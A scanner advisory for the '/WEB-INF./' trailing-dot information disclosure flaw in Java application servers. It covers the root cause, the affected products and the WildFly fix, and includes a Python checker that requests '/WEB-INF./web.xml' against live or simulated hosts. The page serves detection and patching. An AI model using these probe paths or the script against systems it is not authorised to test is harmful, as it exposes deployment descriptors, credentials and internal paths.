Free and open-source vulnerability scanner
Mageni eases for you the vulnerability scanning, assessment, and management process. It is free and open-source.
'/WEB-INF./' Information Disclosure Vulnerability (HTTP)
Information
Severity
Family
CVSSv2 Base
CVSSv2 Vector
Solution Type
Created
Modified
Summary
Various application servers, web servers and related products are prone to an information disclosure vulnerability that lets a client read files under the protected '/WEB-INF/' directory of a deployed web application.
Insight
The servlet specification prohibits servlet containers from serving resources in the '/WEB-INF' and '/META-INF' directories of a web application archive directly to clients. A request such as

http://example.com/WEB-INF/web.xml

should therefore return an error message rather than the contents of the deployment descriptor. Some application or web servers / products, however, expose the file when the client appends a dot to the directory name:

http://example.com/WEB-INF./web.xml
http://example.com/web-inf./web.xml

(note the trailing dot ('.') after 'WEB-INF'). The usual root cause is a mismatch between the container's access check, which compares the request path against the literal prefix '/WEB-INF/', and the underlying filesystem lookup, which on Windows silently drops a trailing dot from a path component so that 'WEB-INF.' resolves to 'WEB-INF'. The deployment descriptor and other files under '/WEB-INF/' (class files, JSP sources, configuration) can reveal servlet mappings, credentials and internal paths to an attacker.
Affected Software
The following products are known to be affected:

- Sybase EA Server 4.0
- OC4J - Oracle Containers for J2EE
- Orion 1.5.3
- JRun 3.0, 3.1 and JRun 4 - Macromedia / Allaire JRun
- HPAS 8.0 - Hewlett Packard App Server
- Pramati 3.0 - Pramati App Server
- WildFly (formerly JBoss Application Server) before 10.0.0.Final
- HPE B-Series SAN Network Advisor Software running WildFly (formerly JBoss Application Server)

Other products might be affected as well.
Detection Method
Sends a crafted HTTP GET request for the deployment descriptor via the trailing-dot path (e.g. '/WEB-INF./web.xml') and checks whether the response contains the contents of the descriptor instead of an error page.
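The following is an added illustration of the check described in the Insight and Detection Method sections above; it is not Mageni's own plugin code. It requests the two trailing-dot variants of web.xml, first confirming that the canonical '/WEB-INF/web.xml' is refused so that a server which simply serves everything is not reported as this specific bypass, and only accepts a 200 response whose body looks like a servlet deployment descriptor. The function names, the constructed sample descriptor and the two simulated servers (one reproducing the literal-prefix check versus trailing-dot normalisation mismatch, one checking after normalisation) are assumptions made for the example so that it runs offline.

```python
import re
import urllib.error
import urllib.request
from urllib.parse import urlsplit

# The two request paths from the advisory text.
PROBE_PATHS = ("/WEB-INF./web.xml", "/web-inf./web.xml")

# Elements a real deployment descriptor contains; a generic XML or HTML
# error page will not contain the root element plus a servlet element.
_ROOT_MARKER = re.compile(rb"<web-app\b", re.I)
_BODY_MARKERS = (re.compile(rb"<servlet(-mapping)?\b", re.I),
                 re.compile(rb"<display-name\b", re.I))


def looks_like_web_xml(status, body):
    """True when a 200 response body looks like a servlet deployment descriptor."""
    if status != 200 or not body:
        return False
    head = body[:65536]
    return bool(_ROOT_MARKER.search(head)) and any(m.search(head) for m in _BODY_MARKERS)


def http_fetch(url, timeout=10):
    """Live fetch used when no fake fetcher is supplied. Returns (status, body)."""
    req = urllib.request.Request(url, headers={"User-Agent": "web-inf-dot-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(65536)
    except urllib.error.HTTPError as e:
        return e.code, e.read(65536)
    except (urllib.error.URLError, OSError):
        return None, b""


def check_web_inf_dot(base_url, fetch=http_fetch):
    """Return the probe URLs that served a deployment descriptor.

    An empty list means the trailing-dot bypass was not observed. If the
    canonical path already serves web.xml the container is misconfigured in a
    different way, and that case is deliberately not attributed to this bypass.
    """
    base = base_url.rstrip("/")
    if looks_like_web_xml(*fetch(base + "/WEB-INF/web.xml")):
        return []
    return [base + p for p in PROBE_PATHS if looks_like_web_xml(*fetch(base + p))]


# --- constructed offline stand-ins for a vulnerable and a fixed container ---

_SAMPLE_WEB_XML = (b'<?xml version="1.0"?><web-app><display-name>demo</display-name>'
                   b'<servlet><servlet-name>admin</servlet-name></servlet></web-app>')
_NOT_FOUND = (404, b"<html><body>Not Found</body></html>")


def _windows_normalise(path):
    # Windows drops a trailing dot from each path component, so 'WEB-INF.'
    # names the same directory as 'WEB-INF'.
    return "/".join(seg.rstrip(".") for seg in path.split("/"))


def vulnerable_server(url):
    """Simulated container: access check on the literal path, lookup after normalisation."""
    path = urlsplit(url).path
    if path.lower().startswith("/web-inf/"):
        return _NOT_FOUND
    if _windows_normalise(path).lower() == "/web-inf/web.xml":
        return 200, _SAMPLE_WEB_XML
    return _NOT_FOUND


def fixed_server(url):
    """Simulated container: normalise first, then refuse anything under WEB-INF."""
    path = _windows_normalise(urlsplit(url).path)
    if path.lower().startswith("/web-inf/"):
        return _NOT_FOUND
    return _NOT_FOUND


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://example.com"
    fetch = http_fetch if len(sys.argv) > 1 else vulnerable_server
    for hit in check_web_inf_dot(target, fetch):
        print("descriptor disclosed via", hit)
```

Run with a real base URL as the first argument to probe a host; without arguments it runs against the simulated vulnerable container. Checking the canonical path first matters in practice: an open directory or a misconfigured reverse proxy that serves '/WEB-INF/web.xml' outright is a finding, but not this one, and reporting it under this plugin would point the operator at the wrong fix.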
Solution
The following vendor fixes are known:

- Update WildFly to version 10.0.0.Final or later.

For other products please contact the vendor for more information on possible fixes.